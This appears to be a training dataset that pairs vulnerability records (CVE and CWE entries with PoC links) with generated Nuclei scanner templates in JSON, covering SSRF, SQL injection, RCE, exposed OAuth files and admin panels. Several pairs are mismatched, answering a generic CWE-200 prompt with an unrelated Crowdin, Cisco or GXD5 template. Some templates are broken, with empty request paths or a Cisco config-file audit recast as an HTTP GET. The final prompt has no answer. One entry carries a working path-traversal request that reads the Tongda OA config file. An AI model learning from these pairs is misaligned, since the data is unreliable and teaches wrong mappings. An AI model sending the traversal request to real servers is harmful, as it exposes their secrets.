[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "fbi-seized-nameserver", "severity": "info", "tags": [ "dns", "ns", "darkweb", "fbi", "seized", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "crowdin", "info": { "name": "Crowdin User Name Information - Detect", "author": "dwisiswant0", "severity": "info", "description": "Crowdin user name information check was conducted.", "tags": [ "osint", "osint-hobby", "crowdin", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "https://crowdin.com/profile/{{user}}" ], "matchers": [ { "type": "status", "status": [ 200 ] }, { "type": "word", "part": "body", "words": [ ") \u2013 Crowdin" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-crowdin", "timestamp": "2025-11-13T15:15:51.712992Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "fbi-seized-nameserver", "severity": "info", "tags": [ "dns", "ns", "darkweb", "fbi", "seized", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "disable-pad-service", "info": { "name": "Cisco Disable PAD - Detect", "author": "pussycat0x", "severity": "info", "description": "Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.\n", "tags": [ "audit", "file", "cisco", "config-audit", "cisco-switch", "router" ], "reference": [ "http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B" ] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-disable-pad-service", "timestamp": "2025-11-13T15:15:39.586080Z" } }
CVE-2023-3578
[CANONICAL_RECORD] { "cve_id": "CVE-2023-3578", "summary": "A vulnerability classified as critical was found in DedeCMS 5.7.109. Affected by this vulnerability is an unknown functionality of the file co_do.php. The manipulation of the argument rssurl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233371.", "affected_products": [ { "vendor": "dedecms", "product": "dedecms", "version_range": "*" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2023-2640", "severity": "high", "tags": [ "cve", "cve2023", "code", "packetstorm", "kernel", "ubuntu", "linux", "privesc", "local", "canonical", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2019-0604", "severity": "critical", "tags": [ "cve", "cve2019", "sharepoint", "microsoft", "rce", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://github.com/nightcloudos/cve/blob/main/SSRF.md", "snippet": "PoC available at https://github.com/nightcloudos/cve/blob/main/SSRF.md" }, { "source": "nvd", "url": "https://vuldb.com/?ctiid.233371", "snippet": "PoC available at https://vuldb.com/?ctiid.233371" }, { "source": "nvd", "url": "https://vuldb.com/?id.233371", "snippet": "PoC available at https://vuldb.com/?id.233371" }, { "source": "nvd", "url": "https://github.com/nightcloudos/cve/blob/main/SSRF.md", "snippet": "PoC available at https://github.com/nightcloudos/cve/blob/main/SSRF.md" }, { "source": "nvd", "url": "https://vuldb.com/?ctiid.233371", "snippet": "PoC available at https://vuldb.com/?ctiid.233371" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2023-3578", "info": { "name": "DedeCMS 5.7.109 - Server-Side Request Forgery", "author": "ritikchaddha", "severity": "critical", "description": "Manipulation of the rssurl parameter in co_do.php leads to server-side request forgery in DedeCMS version 5.7.109.\n", "tags": [ "cve", "cve2023", "dedecms", "ssrf", "oast", "vuln" ], "reference": [ "https://github.com/nightcloudos/cve/blob/main/SSRF.md", "https://nvd.nist.gov/vuln/detail/CVE-2023-3578" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "word", "part": "response", "words": [ "DedeCms" ] } ], "max_redirects": 2 }, { "method": "GET", "path": [], "matchers": [ { "type": "word", "part": "interactsh_protocol", "words": [ "dns", "http" ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 2, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2023-3578", "timestamp": "2025-11-13T15:15:45.583126Z" } }
tongda-video-file-read
[CANONICAL_RECORD] { "cve_id": "tongda-video-file-read", "summary": "There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.\n", "affected_products": [], "paths": [ "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php" ], "indicators": [ "$ROOT_PATH", "$ATTACH_PATH" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-cloud-monitor-disable", "severity": "medium", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "tongda-video-file-read", "info": { "name": "Tongda OA V2017 Video File - Arbitrary File Read", "author": "SleepingBag945", "severity": "medium", "description": "There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.\n", "tags": [ "tongda", "lfi", "vuln" ], "reference": [ "http://wiki.peiqi.tech/wiki/oa/\u901a\u8fbeOA/\u901a\u8fbeOA%20v2017%20video_file.php%20\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e.html" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php" ], "matchers": [ { "type": "word", "words": [ "$ROOT_PATH", "$ATTACH_PATH" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-tongda-video-file-read", "timestamp": "2025-11-13T15:16:07.604822Z" } }
unpkg-angular-csp-bypass
[CANONICAL_RECORD] { "cve_id": "unpkg-angular-csp-bypass", "summary": "Content-Security-Policy Bypass - Unpkg Angular. This template detects Content-Security-Policy Bypass - Unpkg Angular by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "Content-Security-Policy", "unpkg.com" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "ack-cluster-cloud-monitor-disable", "severity": "medium", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-health-disable", "severity": "medium", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-network-policies-disable", "severity": "medium", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "unpkg-angular-csp-bypass", "info": { "name": "Content-Security-Policy Bypass - Unpkg Angular", "author": "renniepak,DhiyaneshDK", "severity": "medium", "description": "Content-Security-Policy Bypass - Unpkg Angular", "tags": [ "xss", "csp-bypass", "unpkg-angular", "vuln" ], "reference": [ "https://github.com/renniepak/CSPBypass/blob/main/data.tsv" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "part": "header", "words": [ "Content-Security-Policy", "unpkg.com" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-unpkg-angular-csp-bypass", "timestamp": "2025-11-13T15:15:39.457127Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "caa-fingerprint", "severity": "info", "tags": [ "dns", "caa", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "gxd5-pacs-connexion-utilisateur", "info": { "name": "GXD5 Pacs Connexion Login Panel - Detect", "author": "dhiyaneshDK", "severity": "info", "description": "GXD5 Pacs Connexion panel was detected.", "tags": [ "panel", "login", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "words": [ "<title>GXD5 Pacs Connexion utilisateur</title>" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-gxd5-pacs-connexion-utilisateur", "timestamp": "2025-11-13T15:15:49.012762Z" } }
oauth-credentials-json
[CANONICAL_RECORD] { "cve_id": "oauth-credentials-json", "summary": "Oauth Credentials file is exposed.. This template detects Oauth Credentials Json by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}/oauth-credentials.json" ], "indicators": [ "\"client_id\":", "\"client_secret\":" ], "severity_hint": "low" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-auditing-disable", "severity": "low", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "oauth-credentials-json", "info": { "name": "Oauth Credentials Json", "author": "DhiyaneshDK", "severity": "low", "description": "Oauth Credentials file is exposed.", "tags": [ "exposure", "oauth", "files", "vuln" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/oauth-credentials.json" ], "matchers": [ { "type": "word", "words": [ "\"client_id\":", "\"client_secret\":" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-oauth-credentials-json", "timestamp": "2025-11-13T15:15:49.928719Z" } }
CVE-2022-0949
[CANONICAL_RECORD] { "cve_id": "CVE-2022-0949", "summary": "The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 6.930 does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection", "affected_products": [ { "vendor": "stopbadbots", "product": "block_and_stop_bad_bots", "version_range": "< 6.930" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "critical" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2020-0646", "severity": "critical", "tags": [ "cve", "cve2020", "net-framework", "sharepoint", "microsoft", "packetstorm", "rce", "kev", "oast", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb", "snippet": "PoC available at https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb" }, { "source": "nvd", "url": "https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb", "snippet": "PoC available at https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2022-0949", "info": { "name": "WordPress Stop Bad Bots <6.930 - SQL Injection", "author": "theamanrawat", "severity": "critical", "description": "WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n", "tags": [ "time-based-sqli", "cve", "cve2022", "stopbadbots", "wp-plugin", "wp", "unauth", "wpscan", "sqli", "wordpress", "vuln" ], "reference": [ "https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb", "https://wordpress.org/plugins/stopbadbots/", "https://nvd.nist.gov/vuln/detail/CVE-2022-0949", "https://github.com/ARPSyndicate/cvemon", "https://github.com/ARPSyndicate/kenzer-templates" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "dsl", "dsl": [ "duration_2>=6", "status_code_2 == 200", "contains(body_3, \"commentform\")" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2022-0949", "timestamp": "2025-11-13T15:15:43.850405Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "tembosocial-panel", "info": { "name": "TemboSocial Admin Panel - Detect", "author": "DhiyaneshDK", "severity": "info", "description": "TemboSocial Admin panel was detected.", "tags": [ "panel", "tembosocial", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/admin.php" ], "matchers": [ { "type": "word", "words": [ "<title>TemboSocial Administration</title>" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "max_redirects": 2 } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-tembosocial-panel", "timestamp": "2025-11-13T15:15:49.339166Z" } }
CVE-2018-17431
[CANONICAL_RECORD] { "cve_id": "CVE-2018-17431", "summary": "Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL.", "affected_products": [ { "vendor": "comodo", "product": "unified_threat_management_firewall", "version_range": "< 2.7.0" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "critical" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2025-1974-k8s", "severity": "critical", "tags": [ "cve", "cve2025", "cloud", "devops", "kubernetes", "ingress", "nginx", "k8s", "k8s-cluster-security" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2014-0160", "severity": "high", "tags": [ "cve", "cve2014", "openssl", "heartbleed", "code", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "http://packetstormsecurity.com/files/159246/Comodo-Unified-Threat-Management-Web-Console-2.7.0-Remote-Code-Execution.html", "snippet": "PoC available at http://packetstormsecurity.com/files/159246/Comodo-Unified-Threat-Management-Web-Console-2.7.0-Remote-Code-Execution.html" }, { "source": "nvd", "url": "https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view", "snippet": "PoC available at https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view" }, { "source": "nvd", "url": "https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437", "snippet": "PoC available at https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437" }, { "source": "nvd", "url": "http://packetstormsecurity.com/files/159246/Comodo-Unified-Threat-Management-Web-Console-2.7.0-Remote-Code-Execution.html", "snippet": "PoC available at http://packetstormsecurity.com/files/159246/Comodo-Unified-Threat-Management-Web-Console-2.7.0-Remote-Code-Execution.html" }, { "source": "nvd", "url": "https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view", "snippet": "PoC available at https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2018-17431", "info": { "name": "Comodo Unified Threat Management Web Console - Remote Code Execution", "author": "dwisiswant0", "severity": "critical", "description": "Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.", "tags": [ "cve", "cve2018", "comodo", "rce", "edb", "vkev", "vuln" ], "reference": [ "https://www.exploit-db.com/exploits/48825", "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276", "https://nvd.nist.gov/vuln/detail/CVE-2018-17431", "https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437", "https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "word", "part": "body", "words": [ "Configuration has been altered" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2018-17431", "timestamp": "2025-11-13T15:15:41.412804Z" } }
CVE-2021-3223
[CANONICAL_RECORD] { "cve_id": "CVE-2021-3223", "summary": "Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.", "affected_products": [ { "vendor": "nodered", "product": "node-red-dashboard", "version_range": "< 2.26.2" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2014-0160", "severity": "high", "tags": [ "cve", "cve2014", "openssl", "heartbleed", "code", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://github.com/node-red/node-red-dashboard/issues/669", "snippet": "PoC available at https://github.com/node-red/node-red-dashboard/issues/669" }, { "source": "nvd", "url": "https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2", "snippet": "PoC available at https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2" }, { "source": "nvd", "url": "https://github.com/node-red/node-red-dashboard/issues/669", "snippet": "PoC available at https://github.com/node-red/node-red-dashboard/issues/669" }, { "source": "nvd", "url": "https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2", "snippet": "PoC available at https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
